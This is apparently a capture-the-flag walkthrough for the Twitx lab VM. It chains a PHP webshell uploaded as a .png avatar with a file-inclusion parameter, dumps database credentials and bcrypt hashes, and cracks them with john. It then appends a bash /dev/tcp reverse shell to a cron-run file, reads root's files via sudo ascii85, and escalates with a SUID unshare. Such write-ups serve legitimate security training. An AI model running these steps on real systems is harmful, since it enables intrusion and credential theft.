# Lab setup

Download: Twitx

Network: NAT, IP: 192.168.1.128

# Penetration process

# Initial information gathering

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 bc:cd:ce:6e:98:09:e5:60:d2:f3:96:74:eb:3f:cc:e3 (ECDSA)
|_  256 b0:38:0c:1c:76:d0:de:64:0a:c4:07:89:4b:71:69:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.59 (Debian)
http://192.168.1.128/info.php
http://192.168.1.128/note
Recuerda contratar certificado del dominio twitx.nyx para el lanzamiento.
(Remember to get a certificate for the twitx.nyx domain for the launch.)

Add twitx.nyx to /etc/hosts, pointing at 192.168.1.128, then enumerate the virtual host:

┌──(root㉿kali)-[~/Desktop]
└─# gobuster dir -u http://twitx.nyx/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://twitx.nyx/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 274]
/index.php            (Status: 200) [Size: 33241]
/user                 (Status: 301) [Size: 305] [--> http://twitx.nyx/user/]
/.html                (Status: 403) [Size: 274]
/assets               (Status: 301) [Size: 307] [--> http://twitx.nyx/assets/]
/upload               (Status: 301) [Size: 307] [--> http://twitx.nyx/upload/]
/css                  (Status: 301) [Size: 304] [--> http://twitx.nyx/css/]
/includes             (Status: 301) [Size: 309] [--> http://twitx.nyx/includes/]
/js                   (Status: 301) [Size: 303] [--> http://twitx.nyx/js/]
/private.php          (Status: 302) [Size: 0] [--> /?error=Zona+privada#registrate]
/javascript           (Status: 301) [Size: 311] [--> http://twitx.nyx/javascript/]
/.php                 (Status: 403) [Size: 274]
/.html                (Status: 403) [Size: 274]
/server-status        (Status: 403) [Size: 274]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Visiting http://twitx.nyx/private.php redirects to the index page with ?error=Zona+privada ("private area") and the #registrate anchor: a registration form that includes a file upload.

Viewing the page source, line 527 carries a hint; URL-decoded, it reads as follows:

<form method="post" action="?i">
<div class="mb-4 row">
  <div class="form-floating mb-3">
      <input class="form-control" id="email" type="email" name="email"
          required="required" />
      <label for="email">Email </label>
  </div>
  <!-- Password number input-->
  <div class="form-floating mb-3">
      <input class="form-control" id="password" type="password" name="password"
          required="required" />
      <label for="password">Contraseña</label>
  </div>
  </div>
  <button class="btn btn-secondary me-5">
      <i class="fa-solid fa-right-to-bracket me-2"></i>Log-in
  </button>
  <button class="btn btn-primary" type="button" data-bs-dismiss="modal">
      <i class="fas fa-xmark fa-fw"></i>
      Cerrar
  </button>
</form>

So there is a hidden login form that POSTs email and password to ?i. Register an account first, then send the login request directly:

┌──(root㉿kali)-[~]
└─# curl -i -X POST --data 'email=123%40123.com&password=12345678' 'http://twitx.nyx/?i' 
HTTP/1.1 302 Found
Date: Fri, 07 Jun 2024 21:42:49 GMT
Server: Apache/2.4.59 (Debian)
Set-Cookie: PHPSESSID=cncdd6f7nb5efvcqlfipknm9bd; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ?success=Usuario+validado+correctamente.#registrate
Set-Cookie: PHPSESSID=cei810vp09qe21mes697253uum; path=/
Content-Length: 0
Content-Type: text/html; charset=UTF-8

The response gives the post-login Location and a PHPSESSID. Note there are two Set-Cookie headers; a browser keeps the last one, so copy that PHPSESSID value into the browser's cookie and refresh the page: we are logged in.

Once logged in, the profile shows the address of the image uploaded at registration. The upload only accepts .png, and requesting the png directly just serves it as an image, so PHP inside it would not run.

But the profile page, together with the directories found by gobuster, shows there is a user directory: http://twitx.nyx/user/profile.php exists. And private.php takes folder and file parameters and includes the named file, so the two can be chained. Register again, this time uploading a PHP webshell saved with a .png extension; get the logged-in session ID with the curl from before, set it in the browser, open the profile and note the png's path.

Put together, this URL triggers it: http://twitx.nyx/private.php?folder=upload&file=152124645266638af1e4b0d9.39084780.png

Because the file is included rather than served, the PHP inside the ".png" executes: a local file inclusion fed by the avatar upload.

That gives code execution as www-data.

# Privilege escalation

The site's config file, /var/www/twitx.nyx/includes/config.php, holds the database credentials:

$dbHost = 'localhost';
$dbUser = 'twitxdbusr';
$dbPassword = '3GcxHeSqbgf1kfj';
$dbDatabase = 'twitxdb';

Let's look inside the database.

www-data@twitx:/var/www/twitx.nyx/includes$ mysql -u twitxdbusr -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| twitxdb            |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use twitxdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [twitxdb]> show tables;
+-------------------+
| Tables_in_twitxdb |
+-------------------+
| users             |
+-------------------+
1 row in set (0.000 sec)
MariaDB [twitxdb]> select * from users;
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+
| id | nombre | email                    | password                                                     | avatar                                | role |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+
|  1 | Lenam  | [email protected] | $2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm |                                       | adm  |
|  2 | 123    | 123@123.com              | $2y$10$nM/m5idaaJoGXk.12HhFDeQdu2fYbMNaN9sFyCWAyycFIzX7RA1ne | 30710014266637852db6459.26073065.png  | usr  |
|  3 | 2222   | 2222@222.com             | $2y$10$1mO34Ve6b76E2Biqalg/..cwfTKn.8cHuMywnKcxpw5E2oiKNzkGS | 1320458475666380f4701ff3.05570504.png | usr  |
|  4 | 111    | 111@111.com              | $2y$10$kH5/MHOtMH25pgXZU6QvoOBJBuNJe0iC7AEEE7fFHix9KidQXAtNe | 16238279576663888a01e193.62033086.png | usr  |
|  5 | 1111   | 1111@1111.com            | $2y$10$hFHKmlMguBsQUDhiHL9/Y.7PYbdgoOHkeAql98mCfo.IQlLcS.ZEC | 152124645266638af1e4b0d9.39084780.png | usr  |
|  6 | 666    | 666@666.com              | $2y$10$KNh0gBRRw7MDLPNliUxmoupnwka8pWmUmZNFf4MSw6uXgySGBt8Ti | 128460101166638d442c1e62.12431542.png | usr  |
+----+--------+--------------------------+--------------------------------------------------------------+---------------------------------------+------+
6 rows in set (0.000 sec)

Let's crack the first row's hash (the adm account).

The $2y$10$ prefix identifies it as bcrypt with cost 10 (hashes.com agrees), so john gets --format=bcrypt:

┌──(root㉿kali)-[~]
└─# echo '$2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm' > hash
                                                                                                        
┌──(root㉿kali)-[~]
└─# john hash --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt   
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
patricia         (?)     
1g 0:00:00:10 DONE (2024-06-07 11:06) 0.09842g/s 99.21p/s 99.21c/s 99.21C/s molly1..petey
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is: patricia
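The identification step above, done locally instead of via hashes.com, as an added example (not code from the original writeup): it parses the modular-crypt bcrypt string from the dump, which also explains john's "Cost 1 (iteration count) is 1024" line, and emits the matching john and hashcat invocations. The hashcat mode number is standard; the file and wordlist names are placeholders.

```python
#!/usr/bin/env python3
"""Added example, not from the original writeup: identify the dumped hashes
locally instead of pasting them into hashes.com, and explain john's
"Cost 1 (iteration count) is 1024" line.

A bcrypt string in modular-crypt format is $2<variant>$<cost>$ followed by
22 characters of salt and 31 characters of digest, 60 characters in all,
using bcrypt's own base64 alphabet (./A-Za-z0-9). The two-digit cost is
log2 of the key-setup iterations, so $10$ means 2**10 = 1024 rounds.
"""
import re
from dataclasses import dataclass
from typing import Optional

B64 = r"[./A-Za-z0-9]"
BCRYPT_RE = re.compile(rf"^\$2([abxy]?)\$(\d\d)\$({B64}{{22}})({B64}{{31}})$")


@dataclass(frozen=True)
class BcryptHash:
    variant: str   # "2a", "2b", "2x" or "2y" (PHP's password_hash emits 2y)
    cost: int      # log2 of the iteration count
    salt: str      # 22 chars = 128-bit salt
    digest: str    # 31 chars = 184 bits of the Blowfish-based digest

    @property
    def rounds(self) -> int:
        return 1 << self.cost


def parse_bcrypt(text: str) -> Optional[BcryptHash]:
    """Return the parsed hash, or None if it is not a well-formed bcrypt string."""
    m = BCRYPT_RE.match(text.strip())
    if not m:
        return None
    variant, cost, salt, digest = m.groups()
    if not 4 <= int(cost) <= 31:  # the range bcrypt implementations accept
        return None
    return BcryptHash("2" + variant, int(cost), salt, digest)


def crack_commands(hash_file: str, wordlist: str) -> dict:
    """Equivalent john and hashcat invocations for a file of bcrypt hashes.

    --format=bcrypt matches the writeup's john run; 3200 is hashcat's mode
    for $2*$ hashes. Both run slowly because of the 1024-round key setup.
    """
    return {
        "john": f"john --format=bcrypt --wordlist={wordlist} {hash_file}",
        "hashcat": f"hashcat -m 3200 -a 0 {hash_file} {wordlist}",
    }


if __name__ == "__main__":
    # The adm row from the users table above.
    h = parse_bcrypt("$2y$10$OZh9Cqq7PupktlS/LbtJu.c4bFXWUaTW3zAbmS1litThpCfMAurtm")
    print(h.variant, "cost", h.cost, "=", h.rounds, "rounds, salt", h.salt)
    for tool, cmd in crack_commands("hash", "/usr/share/wordlists/rockyou.txt").items():
        print(f"{tool}: {cmd}")
```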

su with that password doesn't get us anywhere, so another route is needed.

Upload pspy and watch processes: a scheduled task periodically runs /var/www/twitx.nyx/includes/taak.php, a file www-data can write to. Append a reverse shell to it, with a listener waiting on 192.168.1.129 port 6666: system("bash -c 'bash -i >& /dev/tcp/192.168.1.129/6666 0>&1'");

The listener catches a shell as timer. timer is allowed to run ascii85 through sudo (check with sudo -l), which turns it into an arbitrary file read as root: encode the target file as root, then decode the output back as timer.

timer@twitx:~$ sudo ascii85 "/home/lenam/.ssh/id_rsa" | ascii85 --decode
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted]
-----END OPENSSH PRIVATE KEY-----

That is lenam's SSH private key. Save it locally with mode 600 and log in with ssh -i; the key is passphrase-protected, and the passphrase is patricia, the password cracked earlier (reused).

In lenam's home directory there is a folder named look\inside containing an executable called unshare.

Running ./unshare -h shows an option that takes a uid: -S / --setuid, which sets the uid inside the entered namespace, after which the program runs a shell as that uid.

So set it to 0: ./unshare -S 0

That drops us into a root shell. It is worth checking ls -l ./unshare to see why it works; the page does not say, but a root-owned copy of unshare with the SUID bit set is the usual reason -S 0 yields a shell with uid 0.